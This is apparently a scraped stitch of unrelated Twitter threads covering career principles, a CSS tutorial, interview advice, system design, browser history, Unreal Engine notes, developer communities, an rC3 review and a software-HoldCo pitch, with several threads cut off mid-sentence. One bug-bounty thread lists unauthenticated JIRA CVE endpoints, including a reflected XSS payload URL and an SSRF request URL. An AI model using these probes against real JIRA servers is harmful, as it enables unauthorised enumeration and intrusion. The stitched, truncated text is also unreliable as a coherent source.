Building Principles:

↓

1/

Value = doing things that other people don't do, won't do or can't do.

"You get paid in direct proportion to the difficulty of problems you solve" — Elon Musk

2/

Service is high-touch result generation (building experience), product is low-touch result generation (scaling experience).

3/

In a world of infinite distraction, focus is the only path to freedom.

4/

Sell time to buy experience, sell experience to buy time.

“If you don't find a way to make money while you sleep, you will work until you die.” — Warren Buffett

#Learn365 Day-4: Unauthenticated & Exploitable JIRA Vulnerabilities

There are multiple security vulnerabilities associated with the various versions of JIRA software which are exploited in wild and is one of my personal favourite 3rd Party apps to hunt.

#BugBountyTips

(1/n)

(2/n)
1. CVE-2020-14179 (Information Disclosure)
a. Navigate to /secure/QueryComponent!Default.jspa
b. It leaks information about custom fields, custom SLA, etc.

2. CVE-2020-14181 (User Enumeration)
a. Navigate to /secure/ViewUserHover.jspa?username=

(3/n)
3. CVE-2020-14178 (Project Key Enumeration)
a. Navigate to /browse.
b. Observe the error message on valid vs. invalid project key. Apart from the Enumeration, you can often get unauthenticated access to the project if the protections are not in place.

(4/n)
4. CVE-2019-3402 (XSS)
a. Navigate to /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search

5. CVE-2019-11581 (SSTI)
a. Navigate to /secure/ContactAdministrators!default.jspa

(5/n)
6. CVE-2019-3396 (Path Traversal)
7. CVE-2019-8451 (SSRF)
a. Navigate to /plugins/servlet/gadgets/makeRequest?url=https://:[email protected]
8. CVE-2019-8451 (SSRF)
a. Navigate to

Let's create Phineas using CSS in few simple steps😄

THREAD🧵

STEP 1. Create a head

create a triangle and rotate it so that it looks like a head

STEP 2. Create smile and ear

We have a pseudo elements in CSS, so we can create smile and ear using head::after and head::before

STEP 3. Create eyes

This is the most trickiest part because in order to make an eye we have to create

- One bigger white circle
- then a small black pupil inside white circle
- then a small white reflection in black pupil

Let's create a outer white circle first

STEP 3(I). Create a black pupil

We can create pupil using pseudo element

Software engineering interview experiences don't have to be terrible.

Thread on my best software engineering interview experience.
👇🏼 (Thanks @PaulYacoubian for the idea)

Starting from the top of the funnel, I heard of this company (fintech startup, close to $1b valuation, based in NYC) from a podcast they were advertising on, and I liked the mission.

I went to their website and applied.

Their application portal used greenhouse. One page and no need for re-typing resume info.

They had an open field that said "Tell me something we should know about you".

I wrote about how I was a career switcher, had kids, went to school while working full time, etc.

Here's where they started to stand out.

They emailed me back a few days later and sent me a calendly link to schedule my first interview.

Letting the candidate choose a time for an interview is a small detail but is great for reducing candidate stress.

I scheduled my first interview. I received an email detailing what the interview would be about, what to expect, and what to prepare for. It would be a casual chat.

My interviewer mentioned and asked tons of questions about the free-response field I had filled out earlier.

How should one approach System Design questions during an interview?

Here's the step by step guide:

🧵👇🏻

System design interviews are generally open ended discussions. There's no one right answer.

The main focus in this round is to see your thought process and whether you'll be able to design a minimal system keeping future scale in mind and by following the standard principles.

Know that many interviewers deliberately make it hard to see how you approach a given problem.

You cannot possibly design a complex system in 1-2 hours which engineers usually take months to years to design, develop and build.

So this is how you should approach this round:

1. Clarify the requirements: As mentioned earlier the questions are generally very open ended. So you need to ask a lot of question to set the scope clear for the discussion.

Example: "Design an application like Twitter"

Twitter has a lot of features like:
- Post tweet
- Home timeline
- Profile timeline
- Analytics
- Likes
- Retweets
- Following
- Bookmark
- Trending etc

You get the idea!

1. in the beginning, browsers didn't have download statusbars
2. firefox got a browser statusbar extension. it was configurable and worked well
3. chrome cloned it without options and it didn't work as well

4. firefox realized chrome was faster and more secure at everything and therefore dropped extensions
5. now firefox doesn't have a download statusbar either

6. someone reimplements download statusbars in firefox's new web-extensions format. it's terrible because of the inherent limitations of the significantly less flexible and powerful extension format

7. CHROME WINS! (with its terrible download statusbar implementation which can't be fixed by users, because No Options and No Skins and No Extensions)

this is where we are now

I'm pretty sure whoever designed this control usually makes gender selectors for websites...

Poly Bridge has a language SLIDER.

all languages exist on a spectrum from English to 한국어

next I want to see a game with a "choose language" button and it brings up this language map like it's a skill tree

gonna spend 200 XP to unlock Tamil

that's from

1/ In early 2004 we were heads down executing on Edit and Continue across a large contingent of teams. There had been several iterations of scoping, redesigns, and customer feedback.

2/ We had a weekly meeting every Thursday morning when representatives from each of the teams would get together and review progress. It was fairly heavy weight, but there were so many teams involved that it was necessary to have a regular sync.

3/ Regardless, E&C was coalescing, but teams were stretched thin working diligently to enable scenarios, improve performance, fix bugs, etc. It had been a month or so since we decided to add support for C# to the matrix as well, so folks were a bit stressed.

4/ That set the stage for the meeting that we had on the first Thursday in April. A debugger PM named Habib Heydarian ran the meeting and after a brief intro he gave me a ring to come in and present.

5/ I walked in and handed out a document that I had written up, titled DCR: C# Edit and Continue for Venus. DCR meant design change request, and Venus was the design-time code name for ASP .NET support.

It’s been a minute since I’ve written code. So, I figured that now might be a good time to start learning how to use the Blueprint system in #UnrealEngine. I felt that it’d be interesting to share my progress and mistakes. So here goes!
🧵

1.
Firstly, I made use of the auto-rigging feature in Mixamo to give my character a skeleton. This allows you to use the Mixamo animations for the character in Unreal Engine.

2.
In the Animation Blueprint, I tried to add a punching state to the character. The problem I faced initially was that the character glides while punching. This occurs because multiple states of the animation are active (as their transition conditions are satisfied).

3.
There are a couple of solutions for this:

👉Blending the punch and idle states (character can punch while running) by using the Layered Blend Per Bone node.

👉Disabling input while the punch occurs.

4.
I didn’t like the outcome when I blended the animations. as the hip rotates more than we’d like it to. This leads to the character punching upwards and to the left. This isn’t favorable as the enemy is usually straight ahead. Disabling the input worked way better!

Here are some resources you need as a designer/developer to work on your level of productivity.👨‍💻🍀

(Thread) 🧵👇

1. Focusmate: Focusmate changes the way you work by connecting you to other professionals who have committed to being accountable for finishing their most important

2. Habitica: Habitica is a free habit and productivity app that treats your real life like a game. Habitica can help you achieve your goals to become healthy and

3. BitBucket: Bitbucket is a web-based version control repository hosting service owned by Atlassian, for source code and development projects that use either Mercurial or Git revision control systems.

4. Clickup: ClickUp is a cloud-based collaboration and project management tool suitable for businesses of all sizes and industries. Features include communication and collaboration tools, task assignments and statuses, alerts, and a task

How to join a developer community?
or
How to find mentors/developer friends?

A detailed thread 🧵👇

For context I have been a part of various developer communities for ~3 Years. I have found that learning with people is the best and most effective way to learn.

So here are the ways you can join a developer community:

💻 If you are a student

Many companies have their campus ambassadors/ Hack clubs / Developer club program that you can join or lead in your campus.

Some of my favorites:

⚡️Student Ambassador program @Microsoft (I am a part of this for 2 years now)

Infrastructure review #rc3

There were only 18 heralds for all the talks. It was really hard to pull off, this conference also started a news show. #rc3

Next is the heaven team. 1487 total angels volunteered of which 710 arrived. 76 weeks worth of work hours were done by the angels. They prepared a few goodies for the RC3 world. Badges were given to show angels. Tried to keep traditions from the conference on RC3 world. #rc3

Huge thanks to all the angels who volunteered. This conference would not be possible with the help of everyone. #rc3

Next team is the signal angels, this is the first time that people had to do remote Q&A. The procedure was quite different to the in person event. There were 157 shifts filled by 61 angels. There were 5 unfilled shifts. #rc3

There is real opportunity to:

- scale a HoldCo
- focused on a portfolio of software & digital-forward assets
- serving niche and/or traditionally sleepy verticals

A playbook to follow...

But first... why is there opportunity?

- software is eating the world (& APIs are eating software)
- there are great product opp's for those who know where to look
- theres no real competition
- SaaS/subscription is the best delivery model out there (build once, sell twice+)

And why now?

We’re entering what I call the ‘Deployment Era’ ... where more traditional (sleepy) businesses will increasingly leverage software/tech to improve their model

And the best part is... we're on the front-end of riding this longer-term wave

So what does this mean?

Software (& other digital-first products) will eat more of the ‘traditional SMB’ stack

But most aren’t focused here bc it isn’t sexy or cool…

Which is where the opp is for those who have the right deal nose & know what to build & for who

There is big opportunity to build/scale in overlooked places...

Where you can build/acquire assets that have the best econ delivery model (SaaS/sub), w/ low competition, where you have an inside edge/know everyone in industry, & can do it when no one is looking